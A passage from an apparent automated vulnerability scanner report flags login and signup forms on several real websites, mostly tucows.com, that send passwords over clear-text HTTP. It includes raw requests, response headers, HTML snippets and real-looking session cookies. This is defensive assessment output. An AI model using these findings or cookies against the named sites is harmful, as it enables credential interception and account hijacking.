<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" id="reg_instance" name="reg_instance" value="4CJLTU3g78dbIxk8o4MmRVF4" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

6.12. http://www.made-in-china.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.made-in-china.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.made-in-china.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:28:13 GMT
Server: Apache
Cache-Control: private
Set-Cookie: sf_img=AM; domain=.made-in-china.com; path=/; expires=Fri, 03-Feb-2012 20:28:13 GMT
Set-Cookie: cid=jAxMTAyMDQwNDI4MTM4NjMwMDA6MDE3MTM0NDI4NzEyMzU4MTU1MTEM; domain=.made-in-china.com; path=/
Set-Cookie: sid=TE5OTQ5MTE5NTgzMjI5MzoxNzMuMTkzLjIxNC4yNDMO; domain=.made-in-china.com; path=/
Set-Cookie: JSESSIONID=aYL_X1GnJqlf; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=GBK
Content-Length: 98587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="
...[SNIP]...
<div id="signA" style="display: block;">
<form action="http://membercenter.made-in-china.com/logon.do" name="logon" method="post">
<input type="hidden" name="xcase" value="doLogon" />
...[SNIP]...
</label>
<input type="password" name="logonInfo.logPassword" />
    <p class="capsLock hide">
...[SNIP]...

6.13. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sfweekly.com
Path:   /2010-08-11/news/ihelp-for-autism/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1
Host: www.sfweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d Zend Core/2.5.0 PHP/5.2.4
X-Powered-By: Zend Core/2.5.0 PHP/5.2.4
Cache-Control: public, max-age=900, s-maxage=900
Pragma: cache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Age: 57
Date: Thu, 03 Feb 2011 17:54:17 GMT
Expires: Thu, 03 Feb 2011 18:08:20 GMT
Content-Length: 263362
Connection: close


<!doctype html public "-//w3c//dtd html 4.01 transitional//en" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta name='google-site-verification' content='JJc5K-OyKVMz5QCREOmr5SX-rsF
...[SNIP]...
<div id="login">
<form method="post" action="/readers/login/">
<div style="float: left">
...[SNIP]...
<br />
<input id="ReaderPassword" tabindex="2" class="password" type="password" name="data[Reader][password]"/>
<input tabindex="3" class="submit" type="submit" value="Login" />
...[SNIP]...

6.14. http://www.supermedia.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:13 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...
</h3>
<form id="signinform" name="signin" onkeypress="headerSignIn(event, this, '/spportal/indexLogin.do')"
   action="/spportal/indexLogin.do" method="POST">

<table>
...[SNIP]...
<td>
<input type="password" name="password" class="textfield" id="password" AUTOCOMPLETE = "off"/>
<span class="subtext">
...[SNIP]...

6.15. http://www.supertradeexchange.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supertradeexchange.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.supertradeexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13237
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/
Date: Thu, 03 Feb 2011 19:35:26 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>SuperTradeExchange&reg; - a small business community and barter netwo
...[SNIP]...
</h3>
       <form name="SignIn" action="/acct/login.asp" method="post" onkeyup="eval_button(event, this)">
       <label for="login">
...[SNIP]...
</label>
       <input type="password" name="pwd" id="pwd"><br>
...[SNIP]...

6.16. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefutoncritic.com
Path:   /devwatch/wright-vs-wrong/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /devwatch/wright-vs-wrong/x22 HTTP/1.1
Host: www.thefutoncritic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:43 GMT
Connection: close
Content-Length: 20828

<html>
<head>
<title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title>
<meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright
...[SNIP]...
<td>

           <form name="login" method="post" action="/myfuton.aspx">
               <div align="right">
...[SNIP]...
<img src="/images/password.gif" border="0"> <input name="password" type="password" size="10" value="">
                   <input type="submit" value="sign in!">
...[SNIP]...

6.17. http://www.thumbshots.com/Firefox.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Firefox.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Firefox.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44740
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<body id="Body">
<form name="Form" method="post" action="/Firefox.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="Form" enctype="multipart/form-data">
<div>
...[SNIP]...
<td><input name="dnn$ctr753$Login$Login_DNN$txtPassword" type="password" size="9" id="dnn_ctr753_Login_Login_DNN_txtPassword" class="NormalTextBox" AUTOCOMPLETE="off" value="" style="width:150px;" /></td>
...[SNIP]...

6.18. http://www.tucows.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.19. http://www.tucows.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.20. http://www.tucows.com/about.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.21. http://www.tucows.com/about.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.22. http://www.tucows.com/advertise.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.23. http://www.tucows.com/advertise.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.24. http://www.tucows.com/affiliate/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.25. http://www.tucows.com/affiliate/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.26. http://www.tucows.com/author_ratings.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

